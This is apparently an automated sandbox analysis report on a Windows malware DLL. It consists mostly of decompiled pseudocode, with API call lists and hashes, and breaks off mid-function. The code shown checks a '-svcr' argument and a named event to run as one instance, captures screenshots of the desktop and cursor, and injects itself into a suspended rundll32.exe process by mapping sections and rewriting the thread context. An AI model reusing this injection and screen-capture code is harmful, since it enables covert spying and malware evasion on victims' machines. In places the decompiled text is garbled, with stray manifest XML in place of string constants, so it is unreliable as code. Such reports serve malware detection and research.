                                                                                                                        • String ID: %s "%s%s%s" %s$%s %s$%s%d%c$%s%s%c$%s%s%s$.cab$.exe$.inf$install$remove$restart$vpn
                                                                                                                        • API String ID: 39017707-2794406546
                                                                                                                        • Opcode ID: dc06a852ccbb669c2993b5080dc57bbda6e780d6b013546a88d4809a91ee2205
                                                                                                                        • Instruction ID: 0449499d11f6e2f4abee47aa19376abbf9115b9fda9b6db3c8cecfca3460325a
                                                                                                                        • Opcode Fuzzy Hash: dc06a852ccbb669c2993b5080dc57bbda6e780d6b013546a88d4809a91ee2205
                                                                                                                        • Instruction Fuzzy Hash: CD61C5B2E043A8BBE710EF64CC45F6B77ADAF85714F01450CF954AB280EA76F4148B65
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 96%
                                                                                                                        			E6F3323B0() {
                                                                                                                        				char _v260;
                                                                                                                        				char _v268;
                                                                                                                        				char* _v272;
                                                                                                                        				struct _SECURITY_ATTRIBUTES* _v276;
                                                                                                                        				struct _SECURITY_ATTRIBUTES* _v280;
                                                                                                                        				struct _SECURITY_ATTRIBUTES* _v284;
                                                                                                                        				intOrPtr _v288;
                                                                                                                        				intOrPtr _v292;
                                                                                                                        				void* _v296;
                                                                                                                        				char _v320;
                                                                                                                        				struct HINSTANCE__* _v324;
                                                                                                                        				void _v328;
                                                                                                                        				struct HINSTANCE__* _v332;
                                                                                                                        				char _v336;
                                                                                                                        				long _v340;
                                                                                                                        				char _v344;
                                                                                                                        				CHAR* _t42;
                                                                                                                        				int _t50;
                                                                                                                        				long _t51;
                                                                                                                        				char* _t53;
                                                                                                                        				char* _t54;
                                                                                                                        				void* _t56;
                                                                                                                        				intOrPtr _t62;
                                                                                                                        				void* _t65;
                                                                                                                        				void* _t73;
                                                                                                                        				void* _t88;
                                                                                                                        				signed int _t91;
                                                                                                                        				void* _t92;
                                                                                                                        				long _t96;
                                                                                                                        				void* _t97;
                                                                                                                        
                                                                                                                        				_v328 = LoadLibraryA("msvcrt.dll");
                                                                                                                        				_v324 = LoadLibraryA("user32.dll");
                                                                                                                        				_v332 = LoadLibraryA("shlwapi.dll");
                                                                                                                        				_t42 = GetCommandLineA();
                                                                                                                        				_v340 = 0;
                                                                                                                        				_t88 = E6F33A3D0(_t42,  &_v340);
                                                                                                                        				if(_t88 == 0) {
                                                                                                                        					L24:
                                                                                                                        					FreeLibrary(_v324);
                                                                                                                        					FreeLibrary(_v332);
                                                                                                                        					FreeLibrary(_v328);
                                                                                                                        					ExitProcess(0);
                                                                                                                        				}
                                                                                                                        				if(_v340 <= 1) {
                                                                                                                        					L23:
                                                                                                                        					LocalFree(_t88);
                                                                                                                        					goto L24;
                                                                                                                        				} else {
                                                                                                                        					_t91 = 1;
                                                                                                                        					do {
                                                                                                                        						_t50 = lstrcmpiA( *(_t88 + _t91 * 4), "-svcr");
                                                                                                                        						_t51 = _v340;
                                                                                                                        						if(_t50 != 0) {
                                                                                                                        							goto L5;
                                                                                                                        						}
                                                                                                                        						_t91 = _t91 + 1;
                                                                                                                        						if(_t91 < _t51) {
                                                                                                                        							_t53 = StrRChrA( *(_t88 + _t91 * 4), 0, 0x5c);
                                                                                                                        							if(_t53 == 0) {
                                                                                                                        								break;
                                                                                                                        							}
                                                                                                                        							_t54 =  &(_t53[1]);
                                                                                                                        							if(_t54 != 0 &&  *_t54 != 0) {
                                                                                                                        								wsprintfA( &_v268, "%s%s", "pdll", _t54);
                                                                                                                        								_t56 = OpenEventA(2, 0,  &_v260);
                                                                                                                        								if(_t56 != 0) {
                                                                                                                        									CloseHandle(_t56);
                                                                                                                        									break;
                                                                                                                        								}
                                                                                                                        								_t73 = CreateEventA(0, 1, 0,  &_v260);
                                                                                                                        								_t96 = 0;
                                                                                                                        								if(_t73 != 0) {
                                                                                                                        									_push(0x3c);
                                                                                                                        									_push( &_v320);
                                                                                                                        									L6F33C2EE();
                                                                                                                        									_v344 = 0;
                                                                                                                        									_t62 = E6F332260( *(_t88 + _t91 * 4),  &_v344);
                                                                                                                        									if(_t62 != 0) {
                                                                                                                        										_v292 = _t62;
                                                                                                                        										_v288 = _v344;
                                                                                                                        										_v284 = 0;
                                                                                                                        										_v280 = 0;
                                                                                                                        										_v276 = 0;
                                                                                                                        										_v272 =  *(_t88 + _t91 * 4);
                                                                                                                        										_t92 = CreateThread(0, 0, E6F332340,  &_v328, 0, 0);
                                                                                                                        										if(_t92 != 0) {
                                                                                                                        											_t97 = E6F331D00(_v296, _v292, 0,  &_v332);
                                                                                                                        											if(_v296 != 0) {
                                                                                                                        												NtTerminateThread(_t92, 0);
                                                                                                                        												if(_t97 == 0) {
                                                                                                                        													E6F331C00( &_v336);
                                                                                                                        												}
                                                                                                                        											}
                                                                                                                        											CloseHandle(_t92);
                                                                                                                        											_t96 = 0;
                                                                                                                        										}
                                                                                                                        										_t65 = _v296;
                                                                                                                        										if(_t65 != _t96) {
                                                                                                                        											VirtualFree(_t65, _t96, 0x8000);
                                                                                                                        										}
                                                                                                                        									}
                                                                                                                        								}
                                                                                                                        								CloseHandle(_t73);
                                                                                                                        							}
                                                                                                                        							break;
                                                                                                                        						}
                                                                                                                        						L5:
                                                                                                                        						_t91 = _t91 + 1;
                                                                                                                        					} while (_t91 < _t51);
                                                                                                                        					goto L23;
                                                                                                                        				}
                                                                                                                        			}

































                                                                                                                        APIs
                                                                                                                        • LoadLibraryA.KERNEL32(msvcrt.dll), ref: 6F3323C3
                                                                                                                        • LoadLibraryA.KERNEL32(user32.dll), ref: 6F3323CE
                                                                                                                        • LoadLibraryA.KERNEL32(shlwapi.dll), ref: 6F3323D9
                                                                                                                        • GetCommandLineA.KERNEL32 ref: 6F3323DF
                                                                                                                          • Part of subcall function 6F33A3D0: lstrlenA.KERNEL32(?,?,?,?,00000000,?), ref: 6F33A3DB
                                                                                                                          • Part of subcall function 6F33A3D0: LocalAlloc.KERNEL32(00000040,00000004,?,?,?,00000000,?), ref: 6F33A3F4
                                                                                                                        • lstrcmpiA.KERNEL32(?,-svcr), ref: 6F332429
                                                                                                                        • StrRChrA.SHLWAPI(?,00000000,0000005C,?,-svcr), ref: 6F33244A
                                                                                                                        • wsprintfA.USER32 ref: 6F332478
                                                                                                                        • OpenEventA.KERNEL32(00000002,00000000,?), ref: 6F33248A
                                                                                                                        • CreateEventA.KERNEL32(00000000,00000001,00000000,?), ref: 6F3324A4
                                                                                                                        • RtlZeroMemory.NTDLL(?,0000003C), ref: 6F3324BD
                                                                                                                        • CreateThread.KERNEL32 ref: 6F33250C
                                                                                                                        • NtTerminateThread.NTDLL ref: 6F33253C
                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 6F332553
                                                                                                                        • VirtualFree.KERNEL32(?,00000000,00008000), ref: 6F33256A
                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 6F332571
                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 6F332583
                                                                                                                        • FreeLibrary.KERNEL32(?), ref: 6F332594
                                                                                                                        • FreeLibrary.KERNEL32(?), ref: 6F33259B
                                                                                                                        • FreeLibrary.KERNEL32(?), ref: 6F3325A2
                                                                                                                        • ExitProcess.KERNEL32 ref: 6F3325A6
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.410946846.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.410929497.000000006F330000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.410968304.000000006F33D000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.411025550.000000006F340000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.411060259.000000006F341000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: Library$Free$Load$CloseCreateEventHandleLocalThread$AllocCommandExitLineMemoryOpenProcessTerminateVirtualZerolstrcmpilstrlenwsprintf
                                                                                                                        • String ID: %s%s$-svcr$msvcrt.dll$pdll$shlwapi.dll$user32.dll
                                                                                                                        • API String ID: 4122922002-3260842094
                                                                                                                        • Opcode ID: ba3dd78bd3816c3261faafbb08f3ce6c4237d4eea5135c99e6d5a31c64f96b60
                                                                                                                        • Instruction ID: 3b1e1d5bb70e5227133ba15b556a6e46b90200c1490a516523f2600940f2b47e
                                                                                                                        • Opcode Fuzzy Hash: ba3dd78bd3816c3261faafbb08f3ce6c4237d4eea5135c99e6d5a31c64f96b60
                                                                                                                        • Instruction Fuzzy Hash: E951CF73D047A9ABE710DFA8CD44F5BBBEDAB85714F00490DF95192240DB71E9108BA2
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 59%
                                                                                                                        			E6F3366E0() {
                                                                                                                        				intOrPtr* _v140;
                                                                                                                        				void** _v144;
                                                                                                                        				struct tagRECT _v164;
                                                                                                                        				long _v168;
                                                                                                                        				struct HDC__* _v172;
                                                                                                                        				int _v180;
                                                                                                                        				int _v184;
                                                                                                                        				void _v188;
                                                                                                                        				int _v192;
                                                                                                                        				int _v196;
                                                                                                                        				struct tagCURSORINFO _v212;
                                                                                                                        				struct HDC__* _v216;
                                                                                                                        				intOrPtr _v224;
                                                                                                                        				intOrPtr _v228;
                                                                                                                        				struct HICON__* _v232;
                                                                                                                        				intOrPtr _v252;
                                                                                                                        				intOrPtr _v256;
                                                                                                                        				void* _v264;
                                                                                                                        				intOrPtr _v268;
                                                                                                                        				intOrPtr _v272;
                                                                                                                        				struct HDC__* _v288;
                                                                                                                        				struct HDC__* _v304;
                                                                                                                        				long _v308;
                                                                                                                        				intOrPtr _v316;
                                                                                                                        				struct HDC__* _v320;
                                                                                                                        				intOrPtr _v324;
                                                                                                                        				struct HDC__* _t61;
                                                                                                                        				struct HDC__* _t62;
                                                                                                                        				int _t67;
                                                                                                                        				void* _t70;
                                                                                                                        				int _t75;
                                                                                                                        				intOrPtr _t91;
                                                                                                                        				int _t99;
                                                                                                                        				long _t101;
                                                                                                                        				int _t103;
                                                                                                                        				struct HWND__* _t136;
                                                                                                                        				void* _t137;
                                                                                                                        				int _t138;
                                                                                                                        				struct HDC__* _t139;
                                                                                                                        				intOrPtr _t140;
                                                                                                                        				int _t142;
                                                                                                                        				void* _t144;
                                                                                                                        
                                                                                                                        				_v168 = 0;
                                                                                                                        				_t136 = GetDesktopWindow();
                                                                                                                        				_v164.left = _t136;
                                                                                                                        				_t61 = GetDC(_t136);
                                                                                                                        				_t139 = _t61;
                                                                                                                        				_v172 = _t139;
                                                                                                                        				if(_t139 != 0) {
                                                                                                                        					_t62 = CreateCompatibleDC(_t139);
                                                                                                                        					_v188 = _t62;
                                                                                                                        					if(_t62 != 0) {
                                                                                                                        						_push(0x10);
                                                                                                                        						_push( &(_v164.right));
                                                                                                                        						L6F33C2EE();
                                                                                                                        						GetWindowRect(_t136,  &_v164);
                                                                                                                        						_t103 = _v164.bottom;
                                                                                                                        						_t67 = _v164.right;
                                                                                                                        						_t99 = _t67;
                                                                                                                        						_t142 = _t103;
                                                                                                                        						_t137 = CreateCompatibleBitmap(_t139, _t67, _t103);
                                                                                                                        						_v212.hCursor = _t137;
                                                                                                                        						if(_t137 != 0) {
                                                                                                                        							_t70 = SelectObject(_v212.flags, _t137);
                                                                                                                        							if(_t70 != 0 && _t70 != 0xffffffff && BitBlt(_v216, _v184, _v180, _t99, _t142, _t139, 0, 0, 0x40cc0020) != 0) {
                                                                                                                        								_push(0x14);
                                                                                                                        								_push( &(_v212.hCursor));
                                                                                                                        								L6F33C2EE();
                                                                                                                        								_v212.cbSize = 0x14;
                                                                                                                        								_t75 = GetCursorInfo( &_v212);
                                                                                                                        								if(_t75 != 0 && _v212.flags == 1) {
                                                                                                                        									_push(0x14);
                                                                                                                        									_push( &_v192);
                                                                                                                        									L6F33C2EE();
                                                                                                                        									_t75 = GetIconInfo(_v212.cbSize,  &(_v212.ptScreenPos));
                                                                                                                        									if(_t75 != 0) {
                                                                                                                        										_push(0x18);
                                                                                                                        										_push( &_v180);
                                                                                                                        										L6F33C2EE();
                                                                                                                        										GetObjectA(_v192, 0x18,  &_v188);
                                                                                                                        										_t75 = DrawIconEx(_v288, _v228 - _v256 + _v256 - _v216, _v224 - _v252 + _v252 - _v212, _v232, _v196, _v192, 0, 0, 3);
                                                                                                                        									}
                                                                                                                        								}
                                                                                                                        								__imp__#12(0, 0);
                                                                                                                        								_t138 = _t75;
                                                                                                                        								if(_t138 != 0) {
                                                                                                                        									_push(_t138);
                                                                                                                        									_push(_t142);
                                                                                                                        									_push(_t99);
                                                                                                                        									_push( &_v264);
                                                                                                                        									if(E6F336480() != 0) {
                                                                                                                        										_push(0x48);
                                                                                                                        										_push( &(_v164.right));
                                                                                                                        										L6F33C2EE();
                                                                                                                        										_push(1);
                                                                                                                        										_push( &_v164);
                                                                                                                        										_push(_t138);
                                                                                                                        										if( *((intOrPtr*)( *((intOrPtr*)( *_t138 + 0x30))))() >= 0) {
                                                                                                                        											_t101 = _v168;
                                                                                                                        											if(_t101 != 0) {
                                                                                                                        												_t144 = VirtualAlloc(0, _t101, 0x1000, 4);
                                                                                                                        												if(_t144 != 0) {
                                                                                                                        													_push(8);
                                                                                                                        													_push( &_v264);
                                                                                                                        													L6F33C2EE();
                                                                                                                        													_push(0);
                                                                                                                        													asm("xorpd xmm0, xmm0");
                                                                                                                        													asm("movlpd [esp+0x2c], xmm0");
                                                                                                                        													_push(0);
                                                                                                                        													_push(_v268);
                                                                                                                        													_push(_v272);
                                                                                                                        													_push(_t138);
                                                                                                                        													if( *((intOrPtr*)( *((intOrPtr*)( *_t138 + 0x14))))() < 0) {
                                                                                                                        														L24:
                                                                                                                        														VirtualFree(_t144, 0, 0x8000);
                                                                                                                        													} else {
                                                                                                                        														_t140 = 0;
                                                                                                                        														if(_t101 == 0) {
                                                                                                                        															L23:
                                                                                                                        															_t139 = _v304;
                                                                                                                        															goto L24;
                                                                                                                        														} else {
                                                                                                                        															while(1) {
                                                                                                                        																_push( &_v308);
                                                                                                                        																_push(_t101 - _t140);
                                                                                                                        																_push(_t140 + _t144);
                                                                                                                        																_push(_t138);
                                                                                                                        																_v308 = 0;
                                                                                                                        																if( *((intOrPtr*)( *((intOrPtr*)( *_t138 + 0xc))))() < 0) {
                                                                                                                        																	break;
                                                                                                                        																}
                                                                                                                        																_t91 = _v324;
                                                                                                                        																if(_t91 != 0) {
                                                                                                                        																	_t140 = _t140 + _t91;
                                                                                                                        																	if(_t140 < _t101) {
                                                                                                                        																		continue;
                                                                                                                        																	}
                                                                                                                        																}
                                                                                                                        																break;
                                                                                                                        															}
                                                                                                                        															if(_t140 == 0) {
                                                                                                                        																goto L23;
                                                                                                                        															} else {
                                                                                                                        																 *_v140 = _t140;
                                                                                                                        																_t139 = _v320;
                                                                                                                        																 *_v144 = _t144;
                                                                                                                        																_v316 = 1;
                                                                                                                        															}
                                                                                                                        														}
                                                                                                                        													}
                                                                                                                        												}
                                                                                                                        											}
                                                                                                                        										}
                                                                                                                        									}
                                                                                                                        									 *((intOrPtr*)( *((intOrPtr*)( *_t138 + 8))))(_t138);
                                                                                                                        								}
                                                                                                                        								_t137 = _v264;
                                                                                                                        							}
                                                                                                                        							DeleteObject(_t137);
                                                                                                                        						}
                                                                                                                        						DeleteDC(_v212.flags);
                                                                                                                        						_t136 = _v192;
                                                                                                                        					}
                                                                                                                        					ReleaseDC(_t136, _t139);
                                                                                                                        					return _v172;
                                                                                                                        				} else {
                                                                                                                        					return _t61;
                                                                                                                        				}
                                                                                                                        			}













































                                                                                                                        0x6f3368b5
                                                                                                                        0x6f3368be
                                                                                                                        0x6f3368d4
                                                                                                                        0x6f3368d8
                                                                                                                        0x6f3368de
                                                                                                                        0x6f3368e4
                                                                                                                        0x6f3368e5
                                                                                                                        0x6f3368ef
                                                                                                                        0x6f3368f1
                                                                                                                        0x6f3368f5
                                                                                                                        0x6f336903
                                                                                                                        0x6f336905
                                                                                                                        0x6f336906
                                                                                                                        0x6f336907
                                                                                                                        0x6f33690c
                                                                                                                        0x6f33696c
                                                                                                                        0x6f336974
                                                                                                                        0x6f33690e
                                                                                                                        0x6f33690e
                                                                                                                        0x6f336912
                                                                                                                        0x6f336968
                                                                                                                        0x6f336968
                                                                                                                        0x00000000
                                                                                                                        0x6f336914
                                                                                                                        0x6f336914
                                                                                                                        0x6f33691a
                                                                                                                        0x6f33691f
                                                                                                                        0x6f336926
                                                                                                                        0x6f336927
                                                                                                                        0x6f336928
                                                                                                                        0x6f336934
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f336936
                                                                                                                        0x6f33693c
                                                                                                                        0x6f33693e
                                                                                                                        0x6f336942
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f336942
                                                                                                                        0x00000000
                                                                                                                        0x6f33693c
                                                                                                                        0x6f336946
                                                                                                                        0x00000000
                                                                                                                        0x6f336948
                                                                                                                        0x6f336956
                                                                                                                        0x6f336958
                                                                                                                        0x6f33695c
                                                                                                                        0x6f33695e
                                                                                                                        0x6f33695e
                                                                                                                        0x6f336946
                                                                                                                        0x6f336912
                                                                                                                        0x6f33690c
                                                                                                                        0x6f3368d8
                                                                                                                        0x6f3368be
                                                                                                                        0x6f3368af
                                                                                                                        0x6f336980
                                                                                                                        0x6f336980
                                                                                                                        0x6f336982
                                                                                                                        0x6f336982
                                                                                                                        0x6f336987
                                                                                                                        0x6f336987
                                                                                                                        0x6f336992
                                                                                                                        0x6f336998
                                                                                                                        0x6f33699d
                                                                                                                        0x6f3369a0
                                                                                                                        0x6f3369b2
                                                                                                                        0x6f336715
                                                                                                                        0x6f336715
                                                                                                                        0x6f336715

                                                                                                                        APIs
                                                                                                                        • GetDesktopWindow.USER32 ref: 6F3366F0
                                                                                                                        • GetDC.USER32(00000000), ref: 6F3366FD
                                                                                                                        • CreateCompatibleDC.GDI32(00000000), ref: 6F336717
                                                                                                                        • RtlZeroMemory.NTDLL(?,00000010), ref: 6F336732
                                                                                                                        • GetWindowRect.USER32 ref: 6F33673D
                                                                                                                        • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 6F336752
                                                                                                                        • SelectObject.GDI32(?,00000000), ref: 6F33676C
                                                                                                                        • BitBlt.GDI32(?,?,?,?,?,00000000,00000000,00000000,40CC0020), ref: 6F33679E
                                                                                                                        • RtlZeroMemory.NTDLL(?,00000014), ref: 6F3367B3
                                                                                                                        • GetCursorInfo.USER32(?,?,?,?,?,?,?,?,?,?,00000014), ref: 6F3367C5
                                                                                                                        • RtlZeroMemory.NTDLL(?,00000014), ref: 6F3367E5
                                                                                                                        • GetIconInfo.USER32(?,?), ref: 6F3367F4
                                                                                                                        • RtlZeroMemory.NTDLL(?,00000018), ref: 6F336805
                                                                                                                        • GetObjectA.GDI32(?,00000018,?), ref: 6F336816
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.410946846.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.410929497.000000006F330000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.410968304.000000006F33D000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.411025550.000000006F340000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.411060259.000000006F341000.00000002.00020000.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: MemoryZero$CompatibleCreateInfoObjectWindow$BitmapCursorDesktopIconRectSelect
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3821519111-0
                                                                                                                        • Opcode ID: f2972d9751e82e47922c31759095ead73aaa2a843e33c28de46479fdfd7f13d2
                                                                                                                        • Instruction ID: 5edd4008e85c71a6e05d28f4fc7243db9f12e416d3f7eefce464569818c76a71
                                                                                                                        • Opcode Fuzzy Hash: f2972d9751e82e47922c31759095ead73aaa2a843e33c28de46479fdfd7f13d2
                                                                                                                        • Instruction Fuzzy Hash: CE818A72604395AFD720DF64C884F6BB7E9AB8AB54F00490DFA8497284DB71E805CB62
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 74%
                                                                                                                        			E6F332750(CHAR* _a4) {
                                                                                                                        				intOrPtr _v552;
                                                                                                                        				struct _CONTEXT _v724;
                                                                                                                        				struct _STARTUPINFOA _v792;
                                                                                                                        				struct _PROCESS_INFORMATION _v808;
                                                                                                                        				void* _v812;
                                                                                                                        				void* _v816;
                                                                                                                        				char _t23;
                                                                                                                        				long* _t38;
                                                                                                                        				CHAR* _t51;
                                                                                                                        				void* _t52;
                                                                                                                        				void* _t55;
                                                                                                                        
                                                                                                                        				_t51 = _a4;
                                                                                                                        				_t38 = 0;
                                                                                                                        				if(GetFileAttributesA(_t51) == 0xffffffff) {
                                                                                                                        					return 0;
                                                                                                                        				} else {
                                                                                                                        					_t55 = HeapAlloc(GetProcessHeap(), 8, 0x30c);
                                                                                                                        					if(_t55 != 0) {
                                                                                                                        						_t23 = "on=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0x996628
                                                                                                                        						wsprintfA(_t55, "\"%s%s\" %s \"%s\"", _t23, "rundll32.exe", "-svcr", _t51);
                                                                                                                        						_push(0x44);
                                                                                                                        						_push( &(_v792.dwX));
                                                                                                                        						L6F33C2EE();
                                                                                                                        						_push(0x10);
                                                                                                                        						_push( &(_v808.dwProcessId));
                                                                                                                        						_v792.lpDesktop = 0x44;
                                                                                                                        						L6F33C2EE();
                                                                                                                        						if(CreateProcessA(0, _t55, 0, 0, 0, 4, 0, 0,  &_v792,  &_v808) != 0) {
                                                                                                                        							_push(_v808.hProcess);
                                                                                                                        							_t52 = E6F332640();
                                                                                                                        							if(_t52 == 0) {
                                                                                                                        								L8:
                                                                                                                        								_push(0);
                                                                                                                        								_push(_v808.hProcess);
                                                                                                                        								L6F33C30C();
                                                                                                                        							} else {
                                                                                                                        								_v724 = 0x10002;
                                                                                                                        								if(NtGetContextThread(_v808.hThread,  &_v724) < 0) {
                                                                                                                        									goto L8;
                                                                                                                        								} else {
                                                                                                                        									_v552 = E6F3323B0 - "embly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD" + _t52;
                                                                                                                        									if(NtSetContextThread(_v808,  &(_v792.hStdError)) < 0 || NtResumeThread(_v812, 0) < 0) {
                                                                                                                        										goto L8;
                                                                                                                        									} else {
                                                                                                                        										_t38 = 1;
                                                                                                                        									}
                                                                                                                        								}
                                                                                                                        							}
                                                                                                                        							CloseHandle(_v812);
                                                                                                                        							CloseHandle(_v816);
                                                                                                                        						}
                                                                                                                        						HeapFree(GetProcessHeap(), 0, _t55);
                                                                                                                        					}
                                                                                                                        					return _t38;
                                                                                                                        				}
                                                                                                                        			}















                                                                                                                        APIs
                                                                                                                        • GetFileAttributesA.KERNEL32(?), ref: 6F332762
                                                                                                                        • GetProcessHeap.KERNEL32(00000008,0000030C), ref: 6F332780
                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 6F332783
                                                                                                                        • wsprintfA.USER32 ref: 6F3327AA
                                                                                                                        • RtlZeroMemory.NTDLL(?,00000044), ref: 6F3327BA
                                                                                                                        • RtlZeroMemory.NTDLL ref: 6F3327CE
                                                                                                                        • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 6F3327E6
                                                                                                                        • NtGetContextThread.NTDLL ref: 6F332819
                                                                                                                        • NtSetContextThread.NTDLL ref: 6F332840
                                                                                                                        • NtResumeThread.NTDLL ref: 6F33284F
                                                                                                                        • NtTerminateProcess.NTDLL(?,00000000), ref: 6F332866
                                                                                                                        • CloseHandle.KERNEL32(?,00000044), ref: 6F332876
                                                                                                                        • CloseHandle.KERNEL32(?), ref: 6F33287D
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 6F332882
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 6F332885
                                                                                                                          • Part of subcall function 6F332640: RtlZeroMemory.NTDLL(?,00000008), ref: 6F332669
                                                                                                                          • Part of subcall function 6F332640: NtCreateSection.NTDLL ref: 6F33268B
                                                                                                                          • Part of subcall function 6F332640: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 6F3326B9
                                                                                                                          • Part of subcall function 6F332640: NtMapViewOfSection.NTDLL(08000000,00000000,0000000E,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 6F3326E2
                                                                                                                          • Part of subcall function 6F332640: RtlMoveMemory.NTDLL(?,6F330000,?), ref: 6F3326F6
                                                                                                                          • Part of subcall function 6F332640: NtUnmapViewOfSection.NTDLL(000000FF,?), ref: 6F33272D
                                                                                                                          • Part of subcall function 6F332640: NtClose.NTDLL(?), ref: 6F332737
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.410946846.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.410929497.000000006F330000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.410968304.000000006F33D000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.411025550.000000006F340000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.411060259.000000006F341000.00000002.00020000.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: HeapMemoryProcessSection$CloseThreadViewZero$ContextCreateHandle$AllocAttributesFileFreeMoveResumeTerminateUnmapwsprintf
                                                                                                                        • String ID: "%s%s" %s "%s"$-svcr$D$rundll32.exe
                                                                                                                        • API String ID: 4033018722-303510360
                                                                                                                        • Opcode ID: 92f4d49c012db22edef1ad7d4f11e4aa50548f4ff62a9521053413942993a488
                                                                                                                        • Instruction ID: ab8fbcfaaba371c1cfa2fd055eaa8892908f670feda343a685b42d24368fb71a
                                                                                                                        • Opcode Fuzzy Hash: 92f4d49c012db22edef1ad7d4f11e4aa50548f4ff62a9521053413942993a488
                                                                                                                        • Instruction Fuzzy Hash: B431E5B3A043A96BD310DB65CD80E6BB7DDEBC5768F00091CFA5496280C778D90987B2
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 86%
                                                                                                                        			E6F33A130(void* _a4) {
                                                                                                                        				void* __ebx;
                                                                                                                        				void* __edi;
                                                                                                                        				void* __esi;
                                                                                                                        				void* _t5;
                                                                                                                        				struct HDESK__* _t7;
                                                                                                                        				struct HDESK__* _t13;
                                                                                                                        				void* _t15;
                                                                                                                        
                                                                                                                        				if( *0x6f34027c < 6 || M6F340544 != 0 || M6F340548 == 0) {
                                                                                                                        					if(_a4 == 0) {
                                                                                                                        						return _t5;
                                                                                                                        					} else {
                                                                                                                        						_a4 = 1;
                                                                                                                        						_t7 = GetThreadDesktop(GetCurrentThreadId());
                                                                                                                        						 *0x6f340484 = _t7;
                                                                                                                        						if(_t7 != 0) {
